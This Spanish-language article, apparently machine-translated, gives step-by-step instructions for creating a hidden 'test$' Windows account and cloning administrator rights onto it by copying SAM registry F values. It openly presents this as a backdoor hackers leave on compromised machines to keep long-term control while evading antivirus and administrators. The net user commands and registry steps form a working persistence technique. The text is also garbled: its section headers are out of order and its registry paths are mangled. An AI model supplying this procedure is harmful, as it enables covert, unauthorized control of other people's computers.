Cómo clonar manualmente la cuenta oculta del sistema operativo Windows

  
Agregar cuenta en el modo de línea de comando
Haga clic en " Inicio " → " Ejecutar ", ingrese " cmd " Ejecutar " símbolo del sistema ", ingrese el siguiente comando: net test $ /add and enter Para que pueda crear una cuenta llamada test $ en el sistema. Continúe escribiendo: los administradores de net localgroup prueban $ /add y presionan Intro, lo que elevará la cuenta de $ prueba a los privilegios de administrador.
● Añadir una cuenta oculta
Paso 01Haga clic en " Iniciar " → " Ejecutar ", ingrese " regedt32.exe " Intro, emergente   Editor del Registro ". En regedt32.exe, vaya a " HKEY_LOCAL_MACHINESAMSAM ", haga clic en " Editar " Menú → " Permisos ", en la ventana emergente "Permisos de SAM", seleccione "administradores", a continuación Vaya al control completo de la configuración de permisos y haga clic en " OK <;
● Configurar permiso de operación de registro
Paso 02 Ingrese " regedit.exe " Ejecutar " Editor de registro " en " Ejecutar ", navegue a " HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsersNames ", haga clic en Hide Account "; prueba $ ", el "tipo" en el valor clave que se muestra a la derecha se muestra como 0x404, hasta "HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsers", puede encontrar el elemento "00000404", que corresponde a cada uno. Toda la información sobre la cuenta oculta " test $ " se encuentra en el elemento "00000404". Del mismo modo, podemos encontrar el elemento correspondiente a la cuenta de " administrador " como " 000001F4 ".
El paso 03 exporta el valor clave de " test $ " para probar $ .reg, y exporta los valores de la tecla F de los ítems " 00000404 y " y 000001F4 " user.reg, admin.reg, respectivamente. Abra admin.reg con " Notepad ", copie el contenido después del valor de "F "", reemplace el contenido del valor "F " en user.reg, guarde la cuenta de clonación de
que es la más oculta Backdoors
En Windows, cada cuenta tiene un valor de clave correspondiente en el registro. Este valor de clave afecta los permisos de la cuenta. Cuando el hacker copia el valor clave en el registro, puede clonar la cuenta con un derecho de usuario en una cuenta con derechos de administrador y ocultar la cuenta. Las cuentas ocultas son invisibles tanto en " administración de usuarios " como " símbolo del sistema ". Por lo tanto, los administradores generales de computadoras rara vez encuentran cuentas ocultas, y el daño es enorme.
● Encuentre el valor clave correspondiente a la cuenta oculta en el Paso 04 Ingrese el comando " net user test $ /del " en el símbolo del sistema " >; elimine la cuenta oculta que creamos. No se preocupe, este paso simplemente elimina la "cáscara vacía" de la cuenta oculta, al igual que el rastreo de limpieza después de la invasión, la cuenta oculta no se modifica. Finalmente, hacemos doble clic en los dos archivos de registro test $ .reg y user.reg, los importamos al registro y listo.
Después de piratear un objetivo, un pirata informático generalmente deja una puerta trasera en la computadora de destino para controlar la computadora durante mucho tiempo. Sin embargo, la puerta trasera es finalmente una herramienta de pirateo, que es uno de los objetivos del software antivirus. Una vez actualizado el software antivirus, se elimina la puerta trasera. Pero hay una puerta trasera que nunca será eliminada por un software antivirus, es una cuenta de clonación oculta del sistema.
Copyright © Conocimiento de Windows All Rights Reserved